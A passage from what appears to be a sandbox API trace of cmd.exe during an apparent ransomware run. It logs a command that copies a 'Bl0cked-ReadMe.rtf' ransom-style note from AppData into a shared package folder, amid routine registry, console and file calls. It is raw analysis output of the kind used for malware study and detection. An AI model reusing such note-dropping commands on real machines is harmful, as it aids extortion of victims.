region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30580 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30581 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30582 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30583 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30584 start_va = 0x400000 end_va = 0x4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 30585 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30586 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30587 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30588 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30589 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = 
"private_0x0000000000070000" filename = "" Region: id = 30590 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 30591 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 30592 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 30593 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 697 os_tid = 0x69c [0207.277] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afba4 | out: lpSystemTimeAsFileTime=0x1afba4*(dwLowDateTime=0xb05b9e40, dwHighDateTime=0x1d440a9)) [0207.277] GetCurrentProcessId () returned 0x924 [0207.277] GetCurrentThreadId () returned 0x69c [0207.277] GetTickCount () returned 0x3a505 [0207.277] QueryPerformanceCounter (in: lpPerformanceCount=0x1afb9c | out: lpPerformanceCount=0x1afb9c*=26406880618) returned 1 [0207.283] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0207.283] __set_app_type (_Type=0x1) [0207.283] __p__fmode () returned 0x76b331f4 [0207.283] __p__commode () returned 0x76b331fc [0207.283] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0207.283] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0207.284] GetCurrentThreadId () returned 0x69c [0207.284] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x69c) returned 0x38 [0207.284] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.284] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0207.284] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.284] 
HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.284] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afb34 | out: phkResult=0x1afb34*=0x0) returned 0x2 [0207.284] VirtualQuery (in: lpAddress=0x1afb6b, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.284] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.284] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0207.284] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.284] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afb04, dwLength=0x1c | out: lpBuffer=0x1afb04*(BaseAddress=0x1b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0207.284] GetConsoleOutputCP () returned 0x1b5 [0207.285] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.285] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0207.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.285] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0207.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.285] 
GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.285] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.286] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.286] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.286] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.286] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0207.286] GetEnvironmentStringsW () returned 0x210190* [0207.286] FreeEnvironmentStringsW (penv=0x210190) returned 1 [0207.287] GetEnvironmentStringsW () returned 0x210190* [0207.287] FreeEnvironmentStringsW (penv=0x210190) returned 1 [0207.287] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeaa4 | out: phkResult=0x1aeaa4*=0x40) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0xb8, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x1, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x1, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x0, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, 
lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x40, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x40, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x40, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.287] RegCloseKey (hKey=0x40) returned 0x0 [0207.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeaa4 | out: phkResult=0x1aeaa4*=0x40) returned 0x0 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x40, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.287] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x1, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x1, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x0, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: 
lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x9, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x4, lpData=0x1aeab0*=0x9, lpcbData=0x1aeaa8*=0x4) returned 0x0 [0207.288] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeaac, lpData=0x1aeab0, lpcbData=0x1aeaa8*=0x1000 | out: lpType=0x1aeaac*=0x0, lpData=0x1aeab0*=0x9, lpcbData=0x1aeaa8*=0x1000) returned 0x2 [0207.288] RegCloseKey (hKey=0x40) returned 0x0 [0207.288] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a9 [0207.288] srand (_Seed=0x5b8863a9) [0207.288] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"" [0207.288] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"" [0207.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.289] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2118f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0207.290] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.290] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.290] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.290] 
_wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0207.290] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0207.290] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0207.290] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0207.290] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0207.290] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0207.290] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0207.290] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0207.290] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0207.290] GetEnvironmentStringsW () returned 0x2122e0* [0207.291] FreeEnvironmentStringsW (penv=0x2122e0) returned 1 [0207.291] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.291] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.291] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0207.291] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0207.291] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0207.291] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0207.291] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0207.291] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0207.291] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0207.291] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0207.291] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af870 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.291] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af870, lpFilePart=0x1af86c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af86c*="Desktop") returned 0x18 [0207.291] 
GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.291] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af5ec | out: lpFindFileData=0x1af5ec) returned 0x210020 [0207.292] FindClose (in: hFindFile=0x210020 | out: hFindFile=0x210020) returned 1 [0207.292] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af5ec | out: lpFindFileData=0x1af5ec) returned 0x210020 [0207.292] FindClose (in: hFindFile=0x210020 | out: hFindFile=0x210020) returned 1 [0207.292] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af5ec | out: lpFindFileData=0x1af5ec) returned 0x210020 [0207.292] FindClose (in: hFindFile=0x210020 | out: hFindFile=0x210020) returned 1 [0207.294] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.294] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0207.294] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0207.294] GetEnvironmentStringsW () returned 0x212b00* [0207.295] FreeEnvironmentStringsW (penv=0x212b00) returned 1 [0207.295] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.295] GetConsoleOutputCP () returned 0x1b5 [0207.295] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.295] GetUserDefaultLCID () returned 0x409 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af9b0, cchData=128 | out: lpLCData="0") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af9b0, cchData=128 | out: lpLCData="0") returned 2 [0207.296] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x24, lpLCData=0x1af9b0, cchData=128 | out: lpLCData="1") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0207.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0207.297] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0207.297] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0207.298] GetConsoleTitleW (in: lpConsoleTitle=0x2008e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.298] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.298] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0207.298] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0207.298] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0207.299] _wcsicmp (_String1="type", _String2=")") returned 75 [0207.299] 
_wcsicmp (_String1="FOR", _String2="type") returned -14 [0207.299] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0207.299] _wcsicmp (_String1="IF", _String2="type") returned -11 [0207.299] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0207.299] _wcsicmp (_String1="REM", _String2="type") returned -2 [0207.299] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0207.304] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.305] GetFileType (hFile=0x7) returned 0x2 [0207.305] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.305] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af8a8 | out: lpMode=0x1af8a8) returned 1 [0207.305] _dup (_FileHandle=1) returned 3 [0207.305] _close (_FileHandle=1) returned 0 [0207.305] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0207.305] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1af878, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0207.307] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0207.307] GetConsoleTitleW (in: lpConsoleTitle=0x1af6a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.307] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0207.307] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0207.307] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0207.307] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0207.308] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.308] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1af20c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af20c) returned 0x200e80 [0207.308] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0207.308] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0207.308] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0207.308] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ae118, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0207.309] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0207.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.309] GetFileType (hFile=0x54) returned 0x1 [0207.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.309] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ae170 | out: lpFileSizeHigh=0x1ae170*=0x0) returned 0x1632 [0207.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.309] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.309] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.309] GetFileType (hFile=0x4c) returned 0x1 [0207.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.309] GetFileType (hFile=0x4c) returned 0x1 [0207.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.309] WriteFile (in: 
hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] GetFileType (hFile=0x4c) returned 0x1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] GetFileType (hFile=0x4c) returned 0x1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.310] GetFileType (hFile=0x4c) returned 0x1 [0207.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.311] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.311] GetFileType (hFile=0x4c) returned 0x1 [0207.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.311] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.313] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.313] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, 